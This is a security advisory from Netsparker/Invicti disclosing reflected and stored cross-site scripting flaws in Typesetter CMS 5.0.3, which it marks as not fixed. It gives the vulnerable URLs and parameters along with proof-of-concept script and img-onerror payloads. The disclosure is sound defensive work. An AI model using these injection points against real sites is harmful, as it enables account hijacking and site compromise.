Reflected and Stored Cross-site Scripting Vulnerabilities in Typesetter CMS 5.0.3

Information

Advisory by Netsparker (now Invicti)
Name: Reflected and Stored XSS Vulnerabilities in Typesetter CMS
Affected Software: Typesetter CMS
Affected Versions: 5.0.3
Vendor Homepage: https://www.typesettercms.com/
Vulnerability Type: Cross-site Scripting
Severity: Important
Status: Not Fixed
Invicti Advisory Reference: NS-16-021

Technical Details

Proof of Concept URL for XSSes vulnerabilities in Typesetter CMS;

URL: http://{site}/{typesetter_path}/index.php/Admin_Theme_Content/Text?cmd=EditText&key='"--></style></scRipt><scRipt>alert(0x00C66A)</scRipt>
Parameter Name: key
Parameter Type: GET
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00C66A)</scRipt>

URL: http://{site}/{typesetter_path}/index.php/Admin/Extra
Parameter Name: type
Parameter Type: POST
Attack Pattern: <img src=x onerror=alert(21)>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline

04 Aug 2016 – Issue reported
20 Dec 2016 – Advisory released

Credits & Authors

This issue has been discovered by Omer Citak while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.